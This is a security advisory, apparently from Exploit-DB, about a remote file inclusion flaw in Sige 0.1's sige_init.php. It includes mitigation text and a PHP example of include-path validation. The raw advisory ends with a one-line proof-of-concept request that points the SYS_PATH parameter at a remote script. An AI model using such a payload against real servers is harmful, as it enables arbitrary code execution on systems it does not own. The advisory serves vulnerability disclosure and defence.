Vendor: Sige 0.1
By: Unknown
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Sige 0.1
Affected Version From: Sige 0.1
Affected Version To: Sige 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sige 0.1 sige_init.php Remote File Inclusion Vulnerability

This vulnerability allows an attacker to include a remote file by manipulating the SYS_PATH parameter in the sige_init.php file. By providing a malicious URL in the SYS_PATH parameter, an attacker can execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Sige 0.1 or apply a fix provided by the vendor. Additionally, input validation should be implemented to prevent user-controlled input from being used in file inclusion functions.
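
One way to implement the input validation described above, as an added example and not code from Sige or from the original advisory. It assumes sige_init.php builds an include path from SYS_PATH; the names APP_ROOT and resolve_include are hypothetical.

```php
<?php
declare(strict_types=1);

// Assumed vulnerable pattern (hypothetical, not copied from Sige's source):
//   include $SYS_PATH . 'inc/common.php';   // $SYS_PATH filled from the query string
// Defence in depth in php.ini: allow_url_include = Off

// Fix 1: the base path is a server-side constant, never request data.
const APP_ROOT = __DIR__;

/**
 * Fix 2: resolve an include name against the application root and refuse
 * anything that is not an existing file inside it.
 * Returns the absolute path, or null when the name must be rejected.
 */
function resolve_include(string $root, string $relative): ?string
{
    // URL schemes and stream wrappers (http://, ftp://, php://, data:) and
    // NUL bytes are never valid in a local include name.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative) || strpos($relative, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    $target   = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($rootReal === false || $target === false || !is_file($target)) {
        return null;
    }
    // Containment check: blocks ../ traversal out of the application root.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed sample inputs; the first is the SYS_PATH value from the POC on this page.
$samples = [
    'http://localhost/scripts/020.txt?',
    '../../etc/passwd',
    basename(__FILE__),          // a file that really exists under APP_ROOT
];
foreach ($samples as $s) {
    $path = resolve_include(APP_ROOT, $s);
    printf("%-40s => %s\n", $s, $path === null ? 'rejected' : 'allowed');
}
```

Only the last sample, a real file under the application root, resolves to a path; the remote URL and the traversal attempt both return null and are never passed to include.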
Source

Exploit-DB raw data:

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%  Sige 0.1 sige_init.php Remote File Inclusion Vulnerability
%  http://mesh.dl.sourceforge.net/sourceforge/pfadmin/sige_0.1.tgz
%  POC :
%  /inc/sige_init.php?SYS_PATH=http://localhost/scripts/020.txt?
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

# milw0rm.com [2007-10-28]